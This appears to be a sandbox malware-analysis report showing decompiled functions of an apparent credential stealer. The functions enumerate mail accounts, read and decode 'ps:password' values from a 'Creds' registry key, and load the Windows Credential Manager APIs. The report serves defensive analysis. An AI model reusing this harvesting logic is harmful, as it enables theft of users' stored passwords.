                                                  				void* _t37;
                                                  				void* _t53;
                                                  				char* _t54;
                                                  				intOrPtr _t60;
                                                  				void* _t61;
                                                  				char* _t62;
                                                  				void* _t67;
                                                  				intOrPtr _t84;
                                                  				void* _t85;
                                                  				intOrPtr _t87;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  
                                                  				_t87 = _a4;
                                                  				_t84 = __ecx;
                                                  				_v8 = __ecx;
                                                  				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                  					_t37 = 0;
                                                  				} else {
                                                  					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                  				}
                                                  				_push(0xa);
                                                  				_push("mailbox://");
                                                  				_push(_t37);
                                                  				L00411612();
                                                  				_t89 = _t88 + 0xc;
                                                  				if(_t37 == 0) {
                                                  					L8:
                                                  					_a4 = 0;
                                                  					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
                                                  						while(1) {
                                                  							_t85 = E0040D438(_a4, _t84 + 0x468);
                                                  							_v620 = 0;
                                                  							memset( &_v619, 0, 0x261);
                                                  							_v1232 = 0;
                                                  							memset( &_v1231, 0, 0x261);
                                                  							_t17 = _t85 + 0x104; // 0x104
                                                  							_t18 = _t85 + 0x204; // 0x204
                                                  							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                  							_t20 = _t85 + 0x104; // 0x104
                                                  							_t21 = _t85 + 0x204; // 0x204
                                                  							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                  							_t53 = 0;
                                                  							_t89 = _t89 + 0x38;
                                                  							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                  								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                  							}
                                                  							_push(_t53);
                                                  							_t54 =  &_v620;
                                                  							_push(_t54);
                                                  							L004115B2();
                                                  							if(_t54 == 0) {
                                                  								goto L17;
                                                  							}
                                                  							_t61 = 0;
                                                  							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                  								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                  							}
                                                  							_push(_t61);
                                                  							_t62 =  &_v1232;
                                                  							_push(_t62);
                                                  							L004115B2();
                                                  							if(_t62 != 0) {
                                                  								L18:
                                                  								_a4 = _a4 + 1;
                                                  								_t60 = _v8;
                                                  								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
                                                  									_t84 = _t60;
                                                  									continue;
                                                  								} else {
                                                  								}
                                                  							} else {
                                                  								goto L17;
                                                  							}
                                                  							goto L21;
                                                  							L17:
                                                  							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
                                                  								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
                                                  							} else {
                                                  								goto L18;
                                                  							}
                                                  							goto L21;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                  						_t67 = 0;
                                                  					} else {
                                                  						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                  					}
                                                  					_push(7);
                                                  					_push("imap://");
                                                  					_push(_t67);
                                                  					L00411612();
                                                  					_t89 = _t89 + 0xc;
                                                  					if(_t67 == 0) {
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  				L21:
                                                  				return 1;
                                                  			}
                                                  0x0040cbb2
                                                  0x0040cbbb
                                                  0x0040cbbd
                                                  0x0040cbc0
                                                  0x0040cbcc
                                                  0x0040cbc2
                                                  0x0040cbc7
                                                  0x0040cbc7
                                                  0x0040cbce
                                                  0x0040cbd0
                                                  0x0040cbd5
                                                  0x0040cbd6
                                                  0x0040cbdb
                                                  0x0040cbe0
                                                  0x0040cc0b
                                                  0x0040cc11
                                                  0x0040cc14
                                                  0x0040cc23
                                                  0x0040cc32
                                                  0x0040cc3d
                                                  0x0040cc44
                                                  0x0040cc53
                                                  0x0040cc5a
                                                  0x0040cc5f
                                                  0x0040cc66
                                                  0x0040cc79
                                                  0x0040cc7e
                                                  0x0040cc85
                                                  0x0040cc98
                                                  0x0040cc9d
                                                  0x0040cc9f
                                                  0x0040cca5
                                                  0x0040ccac
                                                  0x0040ccac
                                                  0x0040ccaf
                                                  0x0040ccb0
                                                  0x0040ccb6
                                                  0x0040ccb7
                                                  0x0040ccc0
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccc2
                                                  0x0040ccc7
                                                  0x0040ccce
                                                  0x0040ccce
                                                  0x0040ccd1
                                                  0x0040ccd2
                                                  0x0040ccd8
                                                  0x0040ccd9
                                                  0x0040cce2
                                                  0x0040ccf4
                                                  0x0040ccf4
                                                  0x0040ccf7
                                                  0x0040cd03
                                                  0x0040cc21
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cd09
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cce4
                                                  0x0040ccf2
                                                  0x0040cd17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccf2
                                                  0x0040cc23
                                                  0x0040cbe2
                                                  0x0040cbe5
                                                  0x0040cbf1
                                                  0x0040cbe7
                                                  0x0040cbec
                                                  0x0040cbec
                                                  0x0040cbf3
                                                  0x0040cbf5
                                                  0x0040cbfa
                                                  0x0040cbfb
                                                  0x0040cc00
                                                  0x0040cc05
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cc05
                                                  0x0040cd1e
                                                  0x0040cd24

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                  • API String ID: 4281260487-2229823034
                                                  • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                  • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                  • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                  • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				void _v619;
                                                  				char _v620;
                                                  				void _v1231;
                                                  				char _v1232;
                                                  				void* __edi;
                                                  				void* _t39;
                                                  				void* _t55;
                                                  				char* _t56;
                                                  				intOrPtr _t62;
                                                  				void* _t63;
                                                  				char* _t64;
                                                  				void* _t69;
                                                  				intOrPtr _t89;
                                                  				void* _t91;
                                                  				intOrPtr _t94;
                                                  				void* _t99;
                                                  				void* _t100;
                                                  				void* _t101;
                                                  
                                                  				_t100 = _t99 - 0x4cc;
                                                  				_t94 = _a4;
                                                  				_t89 = __ecx;
                                                  				_v8 = __ecx;
                                                  				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                  					_t39 = 0;
                                                  				} else {
                                                  					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                  				}
                                                  				_push(0xa);
                                                  				_push("mailbox://");
                                                  				_push(_t39);
                                                  				L00411612();
                                                  				_t101 = _t100 + 0xc;
                                                  				if(_t39 == 0) {
                                                  					L9:
                                                  					_a4 = 0;
                                                  					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
                                                  						while(1) {
                                                  							_t91 = E0040D438(_a4, _t89 + 0x468);
                                                  							_v620 = 0;
                                                  							memset( &_v619, 0, 0x261);
                                                  							_v1232 = 0;
                                                  							memset( &_v1231, 0, 0x261);
                                                  							_t17 = _t91 + 0x104; // 0x104
                                                  							_t18 = _t91 + 0x204; // 0x204
                                                  							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                  							_t20 = _t91 + 0x104; // 0x104
                                                  							_t21 = _t91 + 0x204; // 0x204
                                                  							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                  							_t55 = 0;
                                                  							_t101 = _t101 + 0x38;
                                                  							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                  								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                  							}
                                                  							_push(_t55);
                                                  							_t56 =  &_v620;
                                                  							_push(_t56);
                                                  							L004115B2();
                                                  							if(_t56 == 0) {
                                                  								goto L18;
                                                  							}
                                                  							_t63 = 0;
                                                  							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                  								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                  							}
                                                  							_push(_t63);
                                                  							_t64 =  &_v1232;
                                                  							_push(_t64);
                                                  							L004115B2();
                                                  							if(_t64 != 0) {
                                                  								L19:
                                                  								_a4 = _a4 + 1;
                                                  								_t62 = _v8;
                                                  								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
                                                  									_t89 = _t62;
                                                  									continue;
                                                  								} else {
                                                  								}
                                                  							} else {
                                                  								goto L18;
                                                  							}
                                                  							goto L22;
                                                  							L18:
                                                  							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
                                                  								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
                                                  							} else {
                                                  								goto L19;
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                  						_t69 = 0;
                                                  					} else {
                                                  						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                  					}
                                                  					_push(7);
                                                  					_push("imap://");
                                                  					_push(_t69);
                                                  					L00411612();
                                                  					_t101 = _t101 + 0xc;
                                                  					if(_t69 == 0) {
                                                  						goto L9;
                                                  					}
                                                  				}
                                                  				L22:
                                                  				return 1;
                                                  			}
                                                  0x0040cbaa
                                                  0x0040cbb2
                                                  0x0040cbbb
                                                  0x0040cbbd
                                                  0x0040cbc0
                                                  0x0040cbcc
                                                  0x0040cbc2
                                                  0x0040cbc7
                                                  0x0040cbc7
                                                  0x0040cbce
                                                  0x0040cbd0
                                                  0x0040cbd5
                                                  0x0040cbd6
                                                  0x0040cbdb
                                                  0x0040cbe0
                                                  0x0040cc0b
                                                  0x0040cc11
                                                  0x0040cc14
                                                  0x0040cc23
                                                  0x0040cc32
                                                  0x0040cc3d
                                                  0x0040cc44
                                                  0x0040cc53
                                                  0x0040cc5a
                                                  0x0040cc5f
                                                  0x0040cc66
                                                  0x0040cc79
                                                  0x0040cc7e
                                                  0x0040cc85
                                                  0x0040cc98
                                                  0x0040cc9d
                                                  0x0040cc9f
                                                  0x0040cca5
                                                  0x0040ccac
                                                  0x0040ccac
                                                  0x0040ccaf
                                                  0x0040ccb0
                                                  0x0040ccb6
                                                  0x0040ccb7
                                                  0x0040ccc0
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccc2
                                                  0x0040ccc7
                                                  0x0040ccce
                                                  0x0040ccce
                                                  0x0040ccd1
                                                  0x0040ccd2
                                                  0x0040ccd8
                                                  0x0040ccd9
                                                  0x0040cce2
                                                  0x0040ccf4
                                                  0x0040ccf4
                                                  0x0040ccf7
                                                  0x0040cd03
                                                  0x0040cc21
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cd09
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cce4
                                                  0x0040ccf2
                                                  0x0040cd17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccf2
                                                  0x0040cc23
                                                  0x0040cbe2
                                                  0x0040cbe5
                                                  0x0040cbf1
                                                  0x0040cbe7
                                                  0x0040cbec
                                                  0x0040cbec
                                                  0x0040cbf3
                                                  0x0040cbf5
                                                  0x0040cbfa
                                                  0x0040cbfb
                                                  0x0040cc00
                                                  0x0040cc05
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cc05
                                                  0x0040cd1d
                                                  0x0040cd24

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp_strnicmpmemsetsprintf
                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                  • API String ID: 2822975062-2229823034
                                                  • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                  • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                  • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                  • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 56%
                                                  			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                  				int _v8;
                                                  				int _v12;
                                                  				void* _v16;
                                                  				short* _v20;
                                                  				int _v24;
                                                  				char* _v28;
                                                  				char _v32;
                                                  				intOrPtr _v36;
                                                  				char _v40;
                                                  				int _v44;
                                                  				void _v299;
                                                  				char _v300;
                                                  				char _v556;
                                                  				char _v812;
                                                  				char _v4908;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t46;
                                                  				int* _t84;
                                                  				char* _t85;
                                                  
                                                  				// Analyst note (added to the decompiled listing; not part of the sandbox's own output):
                                                  				// opens the "Creds" subkey read-only (0x20019 == KEY_READ), enumerates each child key,
                                                  				// reads its "ps:password" value (up to 0x1000 bytes), hands the blob to E00404811
                                                  				// (inferred from the call pattern to be the decode/decrypt step) and passes the widened
                                                  				// result to the callback stored at *_a4. Left column: instruction address for each line.
                                                  0x0040d703				E004118A0(0x132c, __ecx);
                                                  0x0040d71a				_t84 = 0;
                                                  0x0040d725				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
                                                  0x0040d729				if(_t46 != 0) {
                                                  0x0040d862					return _t46;
                                                  0x0040d862				}
                                                  0x0040d735				_v300 = _t46;
                                                  0x0040d743				memset( &_v299, 0, 0xff);
                                                  0x0040d74b				_push(0xff);
                                                  0x0040d752				_push( &_v300);
                                                  0x0040d753				_v8 = 0;
                                                  0x0040d756				_push(0);
                                                  0x0040d844				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                  0x0040d774					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                  0x0040d792						_v12 = 0x1000;
                                                  0x0040d7a1						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                  0x0040d7aa							_v32 = _v12;
                                                  0x0040d7b3							_v28 =  &_v4908;
                                                  0x0040d7b9							_v40 = _a12;
                                                  0x0040d7bf							_v36 = _a8;
                                                  0x0040d7db							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                  0x0040d7e4								_t85 =  &_v812;
                                                  0x0040d7ea								_v812 = 0;
                                                  0x0040d7f1								_v556 = 0;
                                                  0x0040d7f8								E004060D0(0xff, _t85,  &_v300);
                                                  0x0040d812								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
                                                  0x0040d820								 *((intOrPtr*)( *_a4))(_t85);
                                                  0x0040d825								LocalFree(_v20);
                                                  0x0040d82b								_t84 = 0;
                                                  0x0040d82b							}
                                                  0x0040d7db						}
                                                  0x0040d830						RegCloseKey(_v16);
                                                  0x0040d830					}
                                                  0x0040d836					_v8 = _v8 + 1;
                                                  0x0040d839					_push(0xff);
                                                  0x0040d840					_push( &_v300);
                                                  0x0040d841					_push(_v8);
                                                  0x0040d841				}
                                                  0x00000000				return RegCloseKey(_a16);
                                                  			}


                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                  • memset.MSVCRT ref: 0040D743
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                  • LocalFree.KERNEL32(?), ref: 0040D825
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                  • API String ID: 551151806-1288872324
                                                  • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                  • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                  • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                  • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 56%
                                                  			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                  				void _v4103;
                                                  				char _v4104;
                                                  				char _t30;
                                                  				struct HMENU__* _t32;
                                                  				char _t39;
                                                  				void* _t42;
                                                  				struct HWND__* _t43;
                                                  				struct HMENU__* _t48;
                                                  
                                                  				// Analyst note (added to the decompiled listing; not part of the sandbox's own output):
                                                  				// resource-walking callback. For resource type 4 (RT_MENU) it loads the menu by id and
                                                  				// walks its items through E00407EFB; for type 5 (RT_DIALOG) it instantiates the dialog,
                                                  				// records its caption text and enumerates the child controls (E00407FEB). The table at
                                                  				// 0x417488 is inferred to be a list of dialog ids to skip. Left column: instruction address.
                                                  0x004080a3				_t42 = __edi;
                                                  0x004080a3				_t38 = __ecx;
                                                  0x004080ab				E004118A0(0x1004, __ecx);
                                                  0x004080b0				_t55 = _a8 - 4;
                                                  0x004080b5				if(_a8 != 4) {
                                                  0x004080fb					__eflags = _a8 - 5;
                                                  0x004080ff					if(_a8 == 5) {
                                                  0x00408105						_t39 =  *0x417488;
                                                  0x0040810e						__eflags = _t39;
                                                  0x00408110						if(_t39 == 0) {
                                                  0x00408126							L8:
                                                  0x00408126							_push(_t42);
                                                  0x00408134							sprintf(0x4172c0, "dialog_%d", _a12);
                                                  0x00408155							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
                                                  0x0040815f							_v4104 = 0;
                                                  0x00408165							memset( &_v4103, 0, 0x1000);
                                                  0x00408176							GetWindowTextA(_t43,  &_v4104, 0x1000);
                                                  0x0040817c							__eflags = _v4104;
                                                  0x00408182							if(__eflags != 0) {
                                                  0x00408190								E00407E55(__eflags, "caption",  &_v4104);
                                                  0x00408196							}
                                                  0x0040819e							EnumChildWindows(_t43, E00407FEB, 0);
                                                  0x004081a5							DestroyWindow(_t43);
                                                  0x00408112						} else {
                                                  0x00408120							while(1) {
                                                  0x00408120								_t30 =  *_t39;
                                                  0x00408122								__eflags = _t30;
                                                  0x00408124								if(_t30 == 0) {
                                                  0x00000000									goto L8;
                                                  0x00000000								}
                                                  0x00408114								__eflags = _t30 - _a12;
                                                  0x00408117								if(_t30 != _a12) {
                                                  0x0040811d									_t39 = _t39 + 4;
                                                  0x0040811d									__eflags = _t39;
                                                  0x00000000									continue;
                                                  0x0040811d								}
                                                  0x00000000								goto L11;
                                                  0x00408117							}
                                                  0x00000000							goto L8;
                                                  0x00408120						}
                                                  0x004081ac						L11:
                                                  0x004081ac					}
                                                  0x004080b7				} else {
                                                  0x004080c4					sprintf(0x4172c0, "menu_%d", _a12);
                                                  0x004080d2					_t32 = LoadMenuA(_a4, _a12);
                                                  0x004080d8					 *0x4171b4 =  *0x4171b4 & 0x00000000;
                                                  0x004080df					_t48 = _t32;
                                                  0x004080e1					_push(1);
                                                  0x004080e3					_push(_t48);
                                                  0x004080e4					_push(_a12);
                                                  0x004080e7					E00407EFB(_t38, _t55);
                                                  0x004080f0					DestroyMenu(_t48);
                                                  0x004080f0				}
                                                  0x004081b2				return 1;
                                                  			}


                                                  APIs
                                                  • sprintf.MSVCRT ref: 004080C4
                                                  • LoadMenuA.USER32 ref: 004080D2
                                                    • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                    • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                    • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                    • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                  • DestroyMenu.USER32(00000000), ref: 004080F0
                                                  • sprintf.MSVCRT ref: 00408134
                                                  • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                  • memset.MSVCRT ref: 00408165
                                                  • GetWindowTextA.USER32 ref: 00408176
                                                  • EnumChildWindows.USER32 ref: 0040819E
                                                  • DestroyWindow.USER32(00000000), ref: 004081A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                  • String ID: caption$dialog_%d$menu_%d
                                                  • API String ID: 3259144588-3822380221
                                                  • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                  • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                  • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                  • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040E056() {
                                                  				void* _t1;
                                                  				_Unknown_base(*)()* _t2;
                                                  				struct HINSTANCE__* _t4;
                                                  
                                                  				// Analyst note (added to the decompiled listing; not part of the sandbox's own output):
                                                  				// one-time dynamic resolution of the Toolhelp32 process/module enumeration APIs from
                                                  				// kernel32.dll; the flag at 0x417514 is set only when all five imports resolve, so later
                                                  				// callers can test it before using the function pointers. Left column: instruction address.
                                                  0x0040e05d				if( *0x417514 != 0) {
                                                  0x0040e0d9					return _t1;
                                                  0x0040e0d9				}
                                                  0x0040e065				_t2 = GetModuleHandleA("kernel32.dll");
                                                  0x0040e06b				_t4 = _t2;
                                                  0x0040e06f				if(_t4 == 0) {
                                                  0x0040e0d8					L9:
                                                  0x00000000					return _t2;
                                                  0x0040e0d8				}
                                                  0x0040e07e				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                  0x0040e082				 *0x416fe0 = _t2;
                                                  0x0040e087				if(_t2 != 0) {
                                                  0x0040e08f					_t2 = GetProcAddress(_t4, "Module32First");
                                                  0x0040e093					 *0x416fd8 = _t2;
                                                  0x0040e098					if(_t2 != 0) {
                                                  0x0040e0a0						_t2 = GetProcAddress(_t4, "Module32Next");
                                                  0x0040e0a4						 *0x416fd4 = _t2;
                                                  0x0040e0a9						if(_t2 != 0) {
                                                  0x0040e0b1							_t2 = GetProcAddress(_t4, "Process32First");
                                                  0x0040e0b5							 *0x416e6c = _t2;
                                                  0x0040e0ba							if(_t2 != 0) {
                                                  0x0040e0c2								_t2 = GetProcAddress(_t4, "Process32Next");
                                                  0x0040e0c6								 *0x416fcc = _t2;
                                                  0x0040e0cb								if(_t2 != 0) {
                                                  0x0040e0cd									 *0x417514 = 1;
                                                  0x0040e0cd								}
                                                  0x0040e0cb							}
                                                  0x0040e0ba						}
                                                  0x0040e0a9					}
                                                  0x0040e098				}
                                                  0x00000000				goto L9;
                                                  			}


                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
                                                  • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                  • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                  • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                  • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                                  				void* __esi;
                                                  				struct HINSTANCE__* _t12;
                                                  				struct HINSTANCE__** _t23;
                                                  
                                                  				// Analyst note (added to the decompiled listing; not part of the sandbox's own output):
                                                  				// loads advapi32.dll and resolves the Credential Manager API set (CredReadA, CredFree,
                                                  				// CredDeleteA, CredEnumerateA/W) into the structure at __eax; the "ready" flag in
                                                  				// _t23[1] is set only if CredReadA and CredFree both resolved, otherwise E004046C2
                                                  				// (which calls FreeLibrary, see the APIs list) tears the structure down again.
                                                  				// Left column: instruction address for each line.
                                                  0x00404648				_t23 = __eax;
                                                  0x0040464a				E004046C2(__eax);
                                                  0x00404654				_t12 = LoadLibraryA("advapi32.dll");
                                                  0x0040465c				 *_t23 = _t12;
                                                  0x0040465e				if(_t12 != 0) {
                                                  0x00404676					_t23[2] = GetProcAddress(_t12, "CredReadA");
                                                  0x00404682					_t23[3] = GetProcAddress( *_t23, "CredFree");
                                                  0x0040468e					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
                                                  0x0040469a					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
                                                  0x004046a3					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
                                                  0x004046a7					if(_t23[2] == 0 || _t23[3] == 0) {
                                                  0x004046b8						E004046C2(_t23);
                                                  0x004046af					} else {
                                                  0x004046af						_t23[1] = 1;
                                                  0x004046af					}
                                                  0x004046a7				}
                                                  0x004046c1				return _t23[1];
                                                  			}


                                                  APIs
                                                    • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,75D6F420), ref: 004046C9
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
